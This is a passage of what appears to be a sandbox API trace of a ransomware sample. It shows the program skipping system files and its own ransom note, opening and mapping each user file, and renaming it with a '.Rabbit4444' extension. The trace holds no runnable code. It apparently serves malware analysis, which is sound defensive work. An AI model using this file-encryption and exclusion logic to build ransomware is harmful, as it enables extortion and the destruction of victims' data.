"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_tapsenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_tapsenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.381] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c6a2fbd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2c6a2fbd, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x523, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", cAlternateFileName="AAA960~1.SET")) returned 1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.381] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.381] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms" [0057.381] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.381] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms") returned 72 [0057.381] lstrlenW (lpString="Rabbit4444") returned 10 [0057.382] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.382] lstrlenW (lpString=".dll") returned 4 [0057.382] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.382] lstrlenW (lpString=".lnk") returned 4 [0057.382] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.382] lstrlenW (lpString=".ini") returned 4 [0057.382] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.382] lstrlenW (lpString=".sys") returned 4 [0057.382] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.382] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_threefingerslideenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.382] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.382] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14869279967) returned 1 [0057.382] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1315) returned 1 [0057.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.382] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0057.383] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0057.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.385] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.385] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14869530480) returned 1 [0057.385] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.385] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.385] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.385] CloseHandle (hObject=0x298) returned 1 [0057.385] CloseHandle (hObject=0x278) returned 1 [0057.385] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms.Rabbit4444") returned 200 [0057.385] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_threefingerslideenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_threefingerslideenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.386] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2caa8fac, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2caa8fac, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", cAlternateFileName="AA2D71~1.SET")) returned 1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.386] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.386] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms" [0057.386] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.386] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms") returned 70 [0057.386] lstrlenW (lpString="Rabbit4444") returned 10 [0057.387] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.387] lstrlenW (lpString=".dll") returned 4 [0057.387] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.387] lstrlenW (lpString=".lnk") returned 4 [0057.387] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.387] lstrlenW (lpString=".ini") returned 4 [0057.387] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.387] lstrlenW (lpString=".sys") returned 4 [0057.387] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.387] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_threefingertapenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.387] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.387] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14869779611) returned 1 [0057.387] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1305) returned 1 [0057.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0057.387] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.388] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.390] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14870051825) returned 1 [0057.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0057.390] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.390] CloseHandle (hObject=0x298) returned 1 [0057.390] CloseHandle (hObject=0x278) returned 1 [0057.390] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms.Rabbit4444") returned 198 [0057.390] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_threefingertapenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_threefingertapenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.391] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cbda2ca, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2cbda2ca, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", cAlternateFileName="AA729F~1.SET")) returned 1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.397] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.397] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms" [0057.397] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.397] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms") returned 68 [0057.397] lstrlenW (lpString="Rabbit4444") returned 10 [0057.397] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.397] lstrlenW (lpString=".dll") returned 4 [0057.397] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.397] lstrlenW (lpString=".lnk") returned 4 [0057.397] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.397] lstrlenW (lpString=".ini") returned 4 [0057.398] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.398] lstrlenW (lpString=".sys") returned 4 [0057.398] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.398] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_twofingertapenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.398] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.398] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14870863142) returned 1 [0057.398] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1295) returned 1 [0057.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0057.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0057.398] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.399] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.400] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.400] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.400] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.400] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.400] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.400] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.400] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.400] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.400] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14871116995) returned 1 [0057.400] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0057.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0057.401] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.401] CloseHandle (hObject=0x298) returned 1 [0057.401] CloseHandle (hObject=0x278) returned 1 [0057.401] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms.Rabbit4444") returned 196 [0057.401] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_twofingertapenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_twofingertapenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.402] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ccbf0f7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2ccbf0f7, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", cAlternateFileName="AA9D0C~1.SET")) returned 1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.402] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.402] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms" [0057.402] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.402] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms") returned 60 [0057.402] lstrlenW (lpString="Rabbit4444") returned 10 [0057.402] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.403] lstrlenW (lpString=".dll") returned 4 [0057.403] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.403] lstrlenW (lpString=".lnk") returned 4 [0057.403] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.403] lstrlenW (lpString=".ini") returned 4 [0057.403] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 